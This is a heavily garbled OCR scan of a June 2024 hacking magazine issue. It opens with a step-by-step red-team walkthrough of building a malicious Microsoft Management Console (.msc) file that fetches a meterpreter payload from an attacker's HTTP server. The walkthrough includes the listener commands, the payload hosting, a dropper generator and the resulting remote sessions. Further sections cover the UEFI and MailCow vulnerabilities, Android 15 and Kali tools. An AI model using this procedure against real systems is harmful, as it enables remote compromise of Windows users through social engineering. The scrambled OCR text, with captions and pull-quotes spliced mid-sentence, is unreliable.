Simplifying Cyber Security since 2016 eG June 2024 Edition 7 Issue 6 —_ Learn how Black Hat Hackers hack Exploiting Microsoft Management Console to gain access to Windows systems in Red Team Hacking MOBILE SECURITY Latest security and privacy features in Android 15. VULNERABILITY FOR BEGINNERS UEFI firmware of Phoenix Technologies and MailCow Mail Server WHAT'S NEW Kali Linux 2024.2Copyright © 2016 Hackercool CyberSecurity (OPC) Pvt Ltd |All rights reserved. No part of this publication may be reproduced, distributed, or ee in any form or by any means, including photocopying, recording, or other| lectronic or mechanical methods, without the prior written permission of the lpublishe -r, except in the case of brief quotations embodied in critical reviews and certain other noncommercial uses permitted by copyright law. For permission requests, write to the publisher, addressed “Attention: Permissions Coordinator,” at |the address below. [Any references to historical events, real people, or real places are used fictitiously. Na mes, characters, and places are products of the author's imagination. Hackercool Cybersecurity (OPC) Pvt Ltd. Banjara Hills, Hyderabad 50003. Telangana, India. Website : www.hackercoolmagazine.com] Email Address : (min @hackercoolmagazinInformation provided in this Magazine is strictly for educational purpose only. Please don't misuse this knowledge to hack into devices or networks without taking permission. The Magazine will not take any responsibility for misuse of this information.4 Then you will know the truth and the truth will set you free. John 8:32 Editor's Note Edition 7 Issue 6 We are once again skipping editor's note for the same reason already obvious to you. “IN THIS ATTACK, THE CRIMINALS START A NEW MSBUILD PROCESS WITH A TWIST: THEY SPECIFY & WORKING DIRECTORY LOCATED ON A REMOTE SMB SERVER™ ~ RESEACHERS OF BITDEFENDER ON THE RECENT CHINESE HACKING CAMPAIGNINSIDE See what our Hackercool Magazine's June 2024 Issue has in store for you. 1./)Red Team Hacki Exploiting Mic 2. Mobile Security: Latest security amd privacy features of Android 15. \Vulnerability for beginners: (UEFI firmware of Phoenix technologies. 4.|Vulnerability for beginners: (MailCow Mail server. 5. (Online Securit We analyzed the entire web and found a security threat luring in plain sight 6. What's New: Kali Linux 2024.2. Cybersecurity: Major IT outage brings busines lexplain what happened and why. around the world to a standstill -- experts Downloads Other Useful Resources6 Exploiting Microsoft Management Console to gain access RED TEAM HACKING [Researchers at Elastic Security Labs have identified a novel attack technique being used by ihackers in the wild that exploitd Microsoft Management Console in Windows to evade defenses lund gain access. Elastic Security Labs have codenamed this technique “Grim Resource”. In this onth’s Issue, our readers will learn about this attack technique in detail. What is Microsoft Management Console? [Microsoft Management Console (MMC) is a component present by default in Microsoft Window s that provides system administrators an interface for configuring and monitoring of systems. It wa| ® first introduced in 1008 with the option pack for windows NT 4.0 but later came pre-installed wi th Windows 2000 and its successors. a Jim File Action View Favorites Window Help -8% = => | re) | Console Root Name ‘There are no items to show in this view. More Actions: » Itis usually used for administration of the Windows systems. Examples of popular mmc files are ‘Computer Management” and “Group Policy Editor”.® Computer Management. File Action View Help > i Shared Folders > BB Local Users and Groups > © Performance Device Manager v & Storage FP Disk Management > Services and Applications ¢9 |p 3/ am ee Name © if System Tools oe > @ Task Scheduler tt sei > Gi Event Viewer aa Bhsevices and Applications Local Group Policy Editor File Action View Help je > || 2 | Bo | J Local Computer Policy © Computer Configura > 1 Software Settings Windows Setting] > Ey Administrative Te © 1& User Configuration Software Settings > By Windows Setting > El Administrative Te Select an iter to view its description. bstended (Standard Computer Configuration 1B User ConfigurationWhat are Snap-Ins? Snap-Ins are like tools of Microsoft Management Console. Popular examples of Snap-ins are Eve nt Viewer, Device manager etc. Snapin are tools used in the toolbox called MMC. Why are hackers exploiting MMC? Ever since Microsoft banned Macros by default, hackers have been searching for novel techniqu‘ les to gain access and deliver their malware or payloads. The Grim resource technique is one such ‘echnique. It has same advantages for Red Team too. Now that you have understood what Microsoft Mana- |gement console is and what snap ins are, let’s see how to create a malicious snap-in to exploit IMC. Black Hat Hackers around the world have created a management saved console (msc) file that when clicked upon by the victim exploited a cross-site scripting (XSS) vulnerability present in a [pds.dll library to execute malicious JavaScript code in the context of MMC. However, while red teaming, we can create a malicious .msc file that may not need to exploit an -y vulnerability. Let’s see how. On a Windows system, open Microsoft Management Console (use command mmc in Start menu). Open the File menu and click on Add/Remove snap in. (Bi Constet {Console Root = Hi fe) Acton View Fworter Window Help =Jelx New cen = Oren cx seve cates seve Ae . ‘There are no tems to show in thi view = More Actions » AgdiRemove Soapinn_ Cus Options 1 compmamtmse 2apedemsc eat This will open a new window. In the new window that opens, select “Link to web address” as sh- jown below. "Creating a unique password is one of the easiest ways to protect yourself from being hacked online. By gaming access to our passwords, hackers can steal our money, access our personal accounts and in turn use this information to scam our friends and family."Add or Remove Snap-ins You can select snap-ins for this console from those avalable on your computer and configure the selected set of snap-ins. For extensible snap-in, you can configure which extensions are enabled Available snap-ins: Selected snap-ins: ‘Snapin fendor A ‘Console Root Edit Extensions. soft and, ‘soft Cor Folder ‘soft Cor. Group Polcy Object ‘soft Cor ‘SP seawrity Monitor osoft Cor. &: Policy M, osoft Cor. Roe ERENT Microsoft cor Users and Gro, Performance Monitor (eprint Management et of Policy curity ity Templates nfigurat Advanced, Description: The Link to Web Address snap-n enables you to add an MMC node with a Web page in the results view. OK Cancel This will open another new window. Enter the URL where you will be hosting your payload. In al -world attacks, hackers have mostly used cobalt strike beacon and Brute Ratel payloads while P: lusing this attack technique. As you know, we always replace it with a msfvenom payload. Hackercool Magazine is also available on hea HIT Zinio.Link to Web Address x Hset of snep-ins. For Welcome to the Link to Web Address Wizard Edt Extensons ath or UR NN Browse Advanced, Next> G oK Cancel Now, you can pay with your own local currency TUTTLE a) Hackercool Magazine11 Link to Web Address Welcome to the Link to Web Address Wizard The Link to Web Address snap-in consists of an MMC node with a Web page in the results view. Type the path or URL for the site you want to display, or click Browse. Path or URL: Hackercool Magazine IMCINOM CROC ICL ICAO Wheat co and VAT12 Link to Web Address x Friendly name for the Link to Web Address snap-in: system_update Here’s the .msc file I created. "Red flags to look out for on a suspicious email include threatening language, a generic greeting, poor grammar, spelling mistakes, a mismatched URL, claims of prizes or a request for personal information. Legitimate businesses will never send emails requesting you click on a link to enter or a personal data. Phishing is constantly evolving and the best line of defence to ensure you don't fall victim to the hackers is to trust your gut and if something doesn’t seem right about the email, don’t click on the link."13 [BB Consolet - [Console Root) i File Action View Favorites Window Help = >| i) = i Console Root system update Name fosioncopaos” Now, we need to send this file to the target user. This requires some social engineering of cours- le. Go to File menu and select “Save as” and save the file to your desired location. "The internet and social media has transformed how we communicate with each other on a day to day basis, however, this culture of sharing lies provided cybercriminals with an easy way lo profile potential victims ensuring their phishing attempts are more targeted and harder to spot. Hackers are increasingly turning to social media sites to access personal information such as age, job title, email address, location and social activity. Access to this personal lata provides the hackers acess information that can be used to launch a highly targeted and personalised phishing attack. ‘To reduce your chance of falling victim to the hacker, think more carefully about what you post online, take advantage of enhanced privacy options, restrict access to anyone you don’t know and create strong passwords for your social media accounts."14 Gm Save As og Save in: Desktop -| @2 B &- * i333 P Dropbox Quick access a OneDrive Desktop ia z ADMIN Libraries am ay This PC This PC Libraries é ~ sale be File name: system update msc v sald Save as type: Microsoft Management Console Files (“msc) Vv Cancel Before you send the file to the victim system, make sure the listener is ready on the attacker's sys tem, ~/Desktop http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0: 8000/) ... "One of the most important ways to protect yourself against malware and cyberattacks is through the installation of up to date anti-virus a Anti-virus software is the fust line of defence in detecting threats on your computer and blocking unautho: users from gaining access."msf6 exploit(multi/handler) > set payload windows/x PY a a bee eS te) PENA MP IP CL VAN aa se ek ee eS ee) msf6 exploit(multi/handier) > set lhost 192.168.249 oe) lhost => 192.168.249.148 msf6 exploit(multi/handler) > set lport 80 lport > 80 msf6 exploit(multi/handler) > run Started HTTP reverse handler on http://192.168. 249.148:80 ready to send the16 ieSa > Rea a ) > run [*] Started HTTP reverse handler on http://192.168. 249.148:80 http: //192.168.249.148:80 handling request from 192.168.249.165; (UUID: vryadftd) Without a databa se connected that payload UUID tracking will not wo rk! [*] http: //192.168.249.148:80 handling request from 192.168.249.165; (UUID: vryadftd) Staging x64 payl oad (201820 bytes) http: //192.168.249.148:80 handling request from 192.168.249.165; (UUID: vryadftd) Without a databa ‘You can do reverse engineering, but you can't do reverse hacking." -Francis Crickse connected that payload UUID tracking will not wo al http: //192.168.249.148:80 handling request from 192.168.249.165; (UUID: vryadftd) Staging x64 payl oad (201820 bytes) ... [!] http://192.168.249.148:80 handling request from 192.168.249.165; (UUID: vryadftd) Without a databa se connected that payload UUID tracking will not wo rk! Meterpreter session 1 opened (192.168.249.148:8 0 > 192.168.249.165:53888) at 2024-08-13 02:26:18 -0400 isa yee | meterpreter > sysinfo : CUSTOMER-CARE-1 : Windows 10 (10.0 Build 19045). Architecture ae Cl BOS 3 tLe Ob) Domain : LOOK_RECK_AH Logged On Users : 7 tsa baad : x64/windows meterpreter > getuid TSA aL aT NCO Se RAC BA) meterpreter > ff le on Github (Download link given in our Downloads section) that c msc dropper file for us. Let’s clone the script. "In addition to installin -virus software, it’s vital to ensure that your software is regularly updated to ensure ha are unable to gain access to your compu through vulnerabilities in older and outdated programs."clone https: //github.com/ZERODETECTION/MSC ey ya Cloning into 'MSC_Dropper'... remote: Enumerating objects: 31, done. remote: Counting objects: 100% (31/31), done. remote: Compressing objects: 100% (27/27), done. remote: Total 31 (delta 9), reused 0 (delta 0), pa ck-reused @ (from 0) Receiving objects: 100% (31/31), 15.19 KiB | 324.0 Oe: Pe ioe CET) RUA a(R A) OD od ~/MSC_Dropper detection_rule_2.yar README.md al) eh aP Led msc_dropper.py bao eh as ed There are two templates “templatel.msc” and “template 2.msc” that can be used to generate our MC payloads. ‘The syntax to use the script is shown below. COAL em Se) ) 1-5 UM: bae)) ae eee Lol aL Usage: python msc_dropper.py

set payload windows/x64 ed ek eA eT) payload = windows/x64/meterpreter/reverse_http msf6 exploit( ) > set Lhost 192.168.249.1 oe) lhost => 192.168.249.148 msf6 exploit( ) > set lport 80 lport > 80 msf6 exploit( eae aT} [*] Started HTTP reverse handler on http://192.168.24 9.148:8022 Once, the target user clicks on the “update.msc” file, our payload gets downloaded a kaliS kali)-[~/Desktop ALE) http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:800 YD eres 192.168.249.165 - - [14/Aug/2024 01:41:41] "GET /met_ x64_http_148_80.exe HTTP/1.1" 200 - Then it gets executed giving us a meterpreter session on the target system. protect yourself while using a public Wi-Fi network is to usea VPN. A VPN en its your internet connection makin ure and protecting your privacy. Other safety measures include turning off sharing, sticking to securé sites and switching off Wi-Fi when nol in use." "One of the most important wmsf6 exploit(multi/handler) > run Started HTTP reverse handler on http://192.168.24 9.148:80 [!] http: //192.168.249.148:80 handling request from 1 92.168.249.165; (UUID: bnzrsnqb) Without a database c onnected that payload UUID tracking will not work! http: //192.168.249.148:80 handling request from 1 92.168.249.165; (UUID: bnzrsngb) Staging x64 payload (201820 bytes) ... [!] http://192.168.249.148:80 handling request from 1 yee ee ee ee CUE ree DM eal hae hello Cael Mn hae NAR MUON nee Col GAT we AML aS al Meterpreter session 1 opened (192.168.249.148:80 > 192.168.249.165:63955) at 2024-08-14 01:41:43 -040 [!] http: //192.168.249.148:80 handling request from 1 yee: el ee UE ree DM PRL eM ie Cae Me NAR Mee Col OR Cla aa http: //192.168.249.148:80 handling request from 1 92.168.249.165; (UUID: bnzrsnqb) Staging x64 payload (201820 bytes) [!] http: //192.168.249.148:80 handling request from 1 yee: eel ee Pe UUM Peete DM PRL hae Whe) a onnected that payload UUID tracking will not work! Meterpreter session 1 opened (192.168.249.148:80 — 192.168.249.165:63955) at 2024-08-14 01:41:43 -040 \’) meterpreter > fj EEE "Cyberattacks are costly for small businesses. You may need to pay ransom costs, pro ustomers with free credit monitoring, hire custome ice personnel to handle calls, pay fines and more.meterpreter > sysinfo (ee ae : CUSTOMER-CARE-1 os Windows 10 (10.0 Build 19045). Soa Tt ey DEBI et anise as] mey=f-t Oo ay u aba yacadba : x64/windows isa a SALA) ea TK STS Aoi ee Yh eer So ACs meterpreter > fj Latest security and privacy features of Android 15 MOBILE SECURITY (Google has unveiled new privacy and security features coming to Android 15. Let’ take a look lb + the innovations in the upcoming operating system update. EV io beard ba Fel New Security and Privacy Features in Android 15 At the recent I/O 2024 developer conference in California, Google presented the second beta ve- sion of its Android 15 operating system — codenamed Vanilla Ice Cream. The company also gav e us a closer look at the new security and privacy features coming with the update: While the final release of Android 15 is still a few months away — slated for the third quarter of 024 — we can already explore the new security features this operating system has in store for An ldroid users, Al-Powered Smartphone Theft Protection ‘The most significant security upgrade is a suite of new features designed to protect against smart- phone theft and the user data contained within. Google plans to make some of these features avai- lable not only in Android 15 but also for older versions of the operating system (starting with And{ ‘oid 10) through service updates. LFactory Reset Protection: To prevent thieves from wiping a stolen phone and quickly selling] ht, Android 15 will let you set up a lock that prevents resetting the device without the owner's pass- word. 2.Private Space for Apps: Some apps, like banking ones or instant messengers, can be hidden lund protected with an additional PIN code — preventing thieves from accessing sensitive data. 3.Critical Settings Protection: Disabling Find My Device or changing the screen lock timeout will require authentication using a PIN, password, or biometrics. Accessing critical settings like ch- lunging the PIN, disabling anti-theft, or using passkeys will also require biometric authentication.25 Private space New Anti-Theft Features in Android Several anti-theft features will be available not only in Android 15 but also in versions 10 and ab- love: 1,AI-Powered, Accelerometer-Based Automatic Screen Locking: The screen will automatic- lilly lock if the system detects movements characteristic of someone snatching the phone and quic- Ikly running or driving away. Theft protection26 2.Automatic Locking on Internet Disconnection: The smartphone will automatically lock if ja thief tries to keep it disconnected from the internet for a long time. This can also be set for other | tuations, such as alter a significant number of unsuccessful authentication attempts. Theft protection “4 Motion lock automaticaly locks down your screen to protect your data when t detects 2 theRt motion Theft protection ++ New emete locking feature wil provide an easier their Google account passer27 Protection of Personal Data During Screen Sharing and Recording ooo © Messages Create anew Tribank account Your new TriBank username [email protected] Passkeys are easy and safe. You just need to use your device's fingerprint, ce recognition, or PIN to create nd sign in with a passkey. Sign up with a password instead28 Android 15 also focuses on protecting user data from scams such as fake tech-support: LSelective Screen Sharing: Screen sharing will, by default, only share the specific app the user| s interacting with, not the system interface. Full-screen sharing will still be possible if needed. 2.Notification Content Hiding: The system will only display notification content if the app de veloper has provided a special “public version” for it. Otherwise, the content will be hidden. 3.OTP and Sensitive Data Protection: Android 15 will automatically detect and hide window s that contain one-time passwords or sensitive data during screen sharing or recording. @ > Sharer view Receiver ve One-time passwords Protect one-time passwords Android 15 introduces Enhanced Confirmation Mode to improve upon the Restricted Settings fe ature: L.Trusted Installers: Instead of checking the app installation method, the mechanism will refer {to an XML file built into the operating system containing a list of trusted installers. Apps downloaded from elsewhere will be automatically blocked from accessing notifications and |Accessibility services "Fwo-factor authentication also helps protect against payment fraud — that is, when hackers steal a customer's payment information and try to access their online banking or credit accounts."cy Restricted setting For your security, this setting is currently unavailable. Protecting One-Time Codes in Notifications In addition to the improved Restricted Settings, Android 15 will feature additional prote inst apps intercepting one-time passwords when accessing notifications from other apps. ating system will analyze the notification and remove the one-time password from its contents bef lore passing it to the app.30 9:30 e@ € — Security & privacy @ Your data may be at risk See recommendation Mobile network security Connected to unencrypted network Calls, messages, and data are currently more vulnerable while using your Default SIM. When your connection is encrypted again, you'll get another notification. Learn more Settings App security Play Protect scanning is on Device unlock Screen lock, Face & Fingerprint Unlock Account security31 Warnings About Insecure Cellular Networks Android 15 will introduce new features to protect against attackers using ma stations: 1.Warnings About Unencrypted Connections: The operating system will warn users if their c} fellular connection is unencrypted. 2.Location Tracking Alerts: Users will be notified if a malicious base station or specialized tra- Icking device is recording their location using their device ID (IMSI or IMEI). New App Protection Feature icious cellular base > Close apps to continue App access risk in Play Integrity API CCheck whether other appear running that could be ‘capturing the screen or controting te d + CAPTURING - an app i running the + CONTROLLING -an Available in beta [Android 15 enhances the Play Integrity API, allowing developers to identify fraudulent activity w ‘thin their apps: L.Screen Recording and Overlay Detection: Developers can check if another app is recordin g the screen, displaying windows on top of their app’s interface, or controlling the device on beha| If of the user. 2.Google Play Protect Integration: Developers can check if Google Play Protect is running lon the device and if any known malware has been detected in the system. On-Device Google Play Protect Google Play Protect will now operate directly on user devices, providing "live threat detection" b- analyzing app behavior and sending potentially dangerous apps to Google Cloud for review. Conclusion While Android 15 brings significant advancements in privacy and security, it’s still reeommende- ld to use a comprehensive security solution on all your Android devices. These measures comple- iment the new features and provide additional layers of protection. For more detailed information, |consider reviewing Kaspersky Security & VPN and setting up your Android privacy and security s fettings using the Privacy Checker.32 {EFI firmware of PhoenixTechnolosies VULNERABILITY FOR BEGINNERS [In this month's vulnerability for beginners, keeping in line with the latest trends of vulnerabilities Ibeing detected in processors and components of processors, researchers of supply chain secu rm Eclypsium disclosed a vulnerability with a reported CVSS rating of 7.5 \designed by Phoenix Technologies. phoenix technologies Where is this firmware used? [This firmware runs on multiple families of Intel Core Desktop and mobile processorsi Network gateway (‘eis Firewall Network Switch ) is Desktop Desktop Desktop running Processor with a vulnerable UEFI34 What is the actual vulnerability? ‘The vulnerability is a buffer overflow vulnerability due to use of an unsafe variable in the Truste- ld platform Module (TPM) configuration. A trusted platform module is a physical or embedded se curity technology that is used to store critical information on PC’s to enable platform authenticati- lon. Buffer Buffer Buffer | ovetow | Trusted Platform Module (TPM) configuration TPMs use cryptography for this purpose. This vulnerability is named “UEFIcanhazbufferoverflo w” and can be exploited to execute malicious code. It is tracked as CVE-2024-0762. How this vulnerability can be exploited? If an attacker gains access to a system that is running a processor with vulnerable U xploit it at runtime to elevate privileges. Users from USA, UK, Europe and Canada can now transfer money in TQM ELL COLL Cc ACARI LAS MLTR ie Cc Hackercool MagazineStep 0: Hacker already having low-level persistent access on the target system with vulnerable UEFI. Network gateway jia| Firewall | Network Switch Step 1: Exploits the UEF! vulnerability at runtime to elevate privileges on the system. ee =e Desktop Desktop Desktop running Processor with a vulnerable UEFI36 Impact ‘A vulnerability of this type is commonly exploited by firmware backdoors like Black Lotus. This |gives attacker ongoing persistence within a device. MailCow Mail server VULNERABILITY FOR BEGINNERS Recently two security vulnerabilities have been disclosed in open source mail server called Mai 1Cow mail server. Mail Cow is a Docker based email server. we Where it is used?37 MailCow, like any other mail server is used inside the network of organizations who prefer their jown mail server. This is used to send and receive emails. Network gateway th Firewall Network Switch Ss 2: Desktop user MailCow server admin user Vulnerable MailCow Mail server38 What are the vulnerabilities? were disclosed in all versions of MailC released on April 4, 2024. But the vulnerabilitie: llearn about each of them. 1)CVE-2024-30270 (CVSS This is a directory traversal vulnerability that could result in the execution of arbitrary command s on the mail server by the attackers. 2)CVE-2024-31204 (CVSS score: 6.8) This is a Cross Site Scripting vulnerability via the exception handling mechanism when not oper jating in its DEV_MODE. How these can be exploited? A threat actor can craft a HTML email containing a CSS image that can trigger execution of aX SS payload. If an admin user of the MailCow mail server views this email (no need of clicking an- lything) while being logged in to the admin panel of the emai the hacker can combine bot- lh the vulnerabilities to execute malicious code on the admin panel server Impact By triggering the XSS payload, after exploiting these vulnerabilities, an attacker can hijack a sessi on and perform privilege actions on the mail server. He can even take control of all accounts a M ail cow server subsequently gaining access to sensitive data belonging to the organization. you can pay with your own QU MATEN ALTOS OLIN LUNE to Hackercool Magazine39 Desktop user >_> eS ‘es am Admin MailCow Step 1: Hacker sends a HTML email containing a CSS image that triggers execution of an XSS payload. Hacker Internet Step 2: ‘Admin views this email by being logged into the admin panel of MailCow mail server. Network gateway Network Switch Step 3: Hacker combines both the vulnerabilities to execute malicious code on the MailCow server.40 We analyzed the entire web and found a security threat. ONLINE SECURITY ‘ofs”, your bank's website to steal your personal + nfo. If youre in a rush and don’t inspect the websit- ‘in plain sight. Kevin Saric Computer Scientist & Mechatronic Engineer, : ; ae e closely, you may enter sensitive personal det Is and pay a steep price for your mistake. This c- Our latest research has found that clickable M4 include identity theft, account compromise links on websites can often be redirected to mal- Hcious destinations. We call these “hijackable or financial loss. Something even more dangerous happens whe, Ihyperlinks” and have found them by the millio ns across the whole of the web, including on n programmers mistype web addresses in their ¢ trusted websites. -ode. There’s a chance their typo will direct user -s to an internet domain that has never been pur-| Our paper, published at the 2024 Wb Conferen ce, shows that cybersecurity threats on the web chased. We call these phantom domains. For example, a programmer making a link to t an be exploited at a drastically greater scale tha n previously thought. heconversation.com might accidentally link to Concerningly, we fou tehconversation.com|— "For those in charge of companies note the misspelling. If nd these hijackable hy. @nd their websites, we suggest __ the mistyped domain h u -as never been purchas -ed, someone could co The simplest solution is for website me along and buy that operators to “crawl” their websites phantom domain for a round A$10, hijacking the inbound traffic. In iperlinks on the website’ several technical countermeasures. of large companies, r- |cligious organisations, financial firms and ev- len governments. The h for broken links. Countless free tools ryperlinks on these we are available for doing so. If any these cases, the price 0 Ibsites can be hijacked eee noe broken links are found, fix them 4 programmers’ mistak| lalarms. Only vigilant before they are hijacked." -es is paid by the users. ‘These programmer inking errors don’t just risk directing users to phi If we were able to find these vulnerabilities acr- Sting or spoofing sites. Hijacked traffic can be d ss the web, so can others, Here's what you nee. tected towards a range of traps, including malic la a know. * ° th -ious scripts, misinformation, offensive content, v 7 -iruses and any other hacks the future will bring. | some might say para- oid — users would avoid falling into these traps. What are hijackable hyperlinks? Over half a million phantom Ifyou make a typo when entering your bank’s domains eb address, you might accidentally end up on (Cont'd On Next Page) phishing site — one that impersonates, or "spo-Using high-performance computing clusters, w- le processed the whole browsable web for these vulnerabilities. At a scale never seen in research, FOr average web users, awareness is key. Links fin total we analysed over 10,000 hard drives’ wo- “annot be trusted. Be vigilant. of data. For those in charge of companies and their we- bsites, we suggest several technical countermeas- ures. The simplest solution is for website operato -15 to “crawl” their websites for broken links. Co lin a twist of irony, this even included web-based Wess fre tools are available for doing so. If an oftware designed to enforce privacy legislation Y broken links are found, fix them before they lon websites. are hijacked. Doing so, we found over 572,000 phantom do- fnains. The hijackable hyperlinks directing users o them were found on many trusted websites. We investigated what errors caused these vulne rabilities and categorised them. Most were caus- We, the Web -d by typos in hyperlinks, but we also found an- lother type of programmer generated vulnerabilit British scientist Sir Tim Berners-Lee first propos- y: placeholder domain wy. fe ed the web at CERN in British scientist Sir Tim Berners- 199, In his earliest des When programmers Lee first proposed the web at CERN -ctiption of it - still wid] Klevelop a website that in 1989. In his earliest description “tly *vailable on the w- does not yet have a s] i “ . . eb as a testament to a eee ae a of it — still widely available on the itseit — there is a sectio en enter links to a ph. Web as a testament to itself — there is-n titled “non requirem fantom domain with th- @ section titled “non requirements”, ems”, where security is e expectation the links where security is addressed." addressed. Ths aie ill be fixed later. n includes the fateful p We found this to be common with website desi “Prase: an | . [Data security is] of secondary importance] ‘gn templates, where the aesthetic components 0 at C -ERN, where information exchange is fa website are purchased from another progra-_ still more important. fnmer rather than developed in-house. When th __ While this was true of CERN in 1989, the web e design template is later installed on a website, is now the primary information exchange mediu ¢ phantom domains are often not updated, ma -™ of the modern age. ing links to them hijackable We have come to treat the web as an external To determine if hijackable hyperlinks could be Component of our own brains. This is evidenced exploited in practice, we purchased 51 of the ph by the popularity of large language models like antom domains they point to and passively obse ChatGPT, which themselves are trained on data rved the inbound traffic. From this, we detected from the web. [substantial traffic coming from the hijacked link. As our dependence deepens, it might be time t fs. Compared to similar new domains that lacked -0 mentally re-categorise web data security from Ihijacked links, 88% of our phantom domains got “Non requirements” to “important requirement- more traffic, with up to ten times more visitors. = : This Article first appeared in The Conversation S42 Kali Linux 2024.2 WHAT'S NEW Introduction to Kali Linux Kari tinux is a Linux distribution operating system that is used among cyber security professio- s, ethical hackers, and penetration testers. Kali Linux, developed and maintained by Offensive S- lecurity is a Debian distribution and it is termed the most widely used because it has the largest col Jection of tools that are used to perform a variety of information security tasks, from Vulnerability [Assessment and Penetration Testing to Digital Forensics and Reverse Engineering. ‘What sets Kali Linux apart, however, is that it is oriented to offer a very robust security-testing pl- latform. It comes preloaded with hundreds of tools, so this is the one-stop shop for any professiona 1 charged with the duty to secure a network or system. What makes Kali Linux such an extremely aluable tool is its ability to work in versatile and user-friendly ways whenever you need a full- ale pen test or even a simple security audit. Kali Linux changes are continuous with every new release. In this new change, it updates its tool s, boosts performance, and engages the user much better. Kali Linux 2024.2 is the latest release, a nd it does not fail in bringing a raft of new features and tools that make it more potent for any use| + working in cybersecurity. Introduction to Kali Linux 2024.2 The latest release, Kali Linux 2024.2, continues this tradition of excellence with new features, too Is, and updates that will enhance the user's experience and further amplify the capabilities of this distribution. Kali Linux 2024.2 does come with quite a few key changes at hand that enhance the ldesktop and additional tools for penetration testers. The release does not only keep pace with the latest developments in the domain of cybersecurity, it sets up the stage for new and veteran users t 0 discover and exploit vulnerabilities efficiently. Featuring new tools that can solve developing se- Jcurity concerns and desktop enhancements for improving the general user experience, it lets users perform their security assessment projects more efficiently. "While popular media often depicts computer hackers as loners, the cybercrime ecosystem is highly complex and collaborative. In fact, the hacker economy is so large that the World Economic Forum predicts cybercrime Ce cost the global economy 10.5 trillion annually by 23 > New Tools Added Kali Linux 2024.2 brings quite a few new tools to the table, further extending the possibilities for] [penetration testers by providing enhanced functionality for many kinds of security assessments] [These tools address problems in the cybersecurity domain and will give pentesters what they need| to be ahead of threats. 1.AutoRecon AutoRecon is a multithreaded network reconnaissance tool developed to save a lot of time for p enetration testers. This is especially true for CTF situations, such as those encountered during the OSC? or in real-world engagements. It is a powerful tool in the enumeration of services by condu- lcting comprehensive scanning on a target network, fast in searching for open ports and running se rvices. AutoRecon automates several wellknown tools, such as Nmap and gobuster, among other s, for gaining fine-grained information about a network. Hence, this automation will provide accel eration at the very first stage of reconnaissance and guarantee that no service will be skipped, thus ldelivering a view overall of the target. "Mobile cyberattacks are on the rise — and they can be just as devastating to SMBs as computer and network hacks. I's crucial to include mobile devices in cybersecurity plans for comprehensive security coverage."eo teg eC ee Cams ee mo elm ae CS {-mp MAX_PORT SCANS] [-c CONFIG FILE] [-g GLOBAL FILE] Sect eat ete a) en geet ee are Ue O ee acm | --plugins-dir PLUGINS DIR] [--add-plugins-dir PLUGINS DIR] see eer ar Cree 13 eters eg eer tee eee UU Le ees OS Se ees mar Amee Og] -nmap NMAP | --nmap-append NMAP_APPEND] [--proxychains] -disable-sanity-checks] [--disable-keyboard-control] Belge cee ia steep oI Co aS eee O EL Ls. Cees OL 12 ee CMe OED mck OA eee eee Too slang est meets ae TL 1e) Sea OCR Ca ae ee OB) -dirbuster.wordlist VALUE [VALUE ...]] Seen An see rac ean] eet eee eee RS] pee eran ee COLLIS Ue mun Tears 3) ies Mee era se Ce Ser eee urea | pers em rg ea VR a8 Sue ee) Ue uae Te) -vhost-enum.wordlist VALUE [VALUE ...]] hee Ue CU eu UM aT ee Scala eee ee ee etre kl seer Ce Ue] ra cc ee if [ [ [- ( i if [ ie [ [ [ if Ce i if i te [- if [ if [ i De Ce ee ee CUR RL sce em Ceased CRC URest CRC ioe 2.Coercer Coercer is a Python script that enables lateral movement within networks where Windows server s are c to authenticate to arbitrary machin ime purpose behind dev ko demonstrate possible ways of making a Windows server authenticate and that helps to a INTLM hashes or some other form of authentication data. Coercer is very helpful during penetrati reuse in privil greatly implied for a a tester and makes penetration t tive at finding possible vulnerabilities within a network's authentication protocols. "Hackers' favorite accounts to target include Facebook, Instagram, Spotify and Twitch They'll use leaked credentials or steal login details via phishing emails."Pe Cae) a va ann ya ee] i ANN 7d \. AC eae TE ER oO 2d See iets eae ee CR positional arguments fee eee a ee) Se eee eo ee ee Ree Ue sce s Ca Cre Set mes es el ea mee ey Car Cs) cig oe em ec ee te oe) ee OUR ibs tls Cue CMe tose options: eat) See Rue s ag Vee NO EL CCE ee eS) 3.GetSploit GetSploit moves the concept of the searchsploit tool a ste d. It merges the ching for exploit code from the command line with the capability of immediate download, Itis n online exploit database query for ExploitDB, Metasploit, and Packetstorm, which provides an lbility for penetration testers to find relevant exploits without having to leave their terminal. Anot lher of the strongest features of GetSploit is its ability to allow exploit source code to download dir lectly into a user working directory. This makes the exploitation process easier. This is convenient i n scenarios whereby, as a penetration tester, one needs faster access to exploit code during an en- lgagement. They can respond to the discovered vulnerabilities quickly. What makes GeiSploit so p “owerful is that this broad search across numerous databases increases its chances of returning wit hha working exploit Pea eT Cea) PoC te Ce CMS aehoy Cts Cure eat Cee ens -t, --title Search JUST the exploit title (Default is description Pegs) -i, --json Show result in JSON format See ac Mirror (aka copies) search result exploit files to the Etta e cee eis aL ee ree ee me cee ic eae) Somers a ee UC Ore Cee a Tee) ee eee ee Re Le a) eee at La46 4.GoWitness GoWitness is a utility written in Golang, used for taking screenshots of websites and web applicat ions. It is very helpful in the documentation of a target's web interfaces during penetration testing. lit uses Headless Chrome to take screenshots and provides a clear view of the target's web interfa les directly from the command line. GoWitness is very handy during the reconnaissance phase of lh web application test. In most cases, knowing how web pages are laid out and presented helped i n finding potential vulnerabilities. Coupled with that, it also helps in documentation by capturing the screenshot. It is automatically stored for one to view later or put into the report. This feature is lespecially very vital for penetration testers since they need to have proper records of their findings land present them in a clear, well-viewed format ee Pe ee ee Cu ae OSC UM luis mcr eC) er PoetcenCLLL) CORE eee Ue completion Generate the autocompletion script for the specified shell aeat Screenshot URLs sourced from a file or stdin td Pane sal igs ba CRC ee aC MeL ket nessus eaeagte eC Le Mere cma) cr eae ee ee eed tags Se rca as a CIDR range and take screenshots along the way Pare See eee ee eer ee Sa estat cei an a ae een ieee Piles Cl) eu es Cae Pad 5.Sickle-Tool Sickle is a development tool for payloads that caters to the specific needs of penetration testers w orking with shellcode and other kinds of payloads. Originally developed for shellcode crafting, Si ckle has matured to cater to several types of exploits, particularly those involving assembly. It pro: ides testers with a platform for developing custom payloads to build an exploit around a given p- layload after completion. It is quite helpful for the penetration tester in most cases of general paylo lads being ineffective or in specific scenarios in which the attack 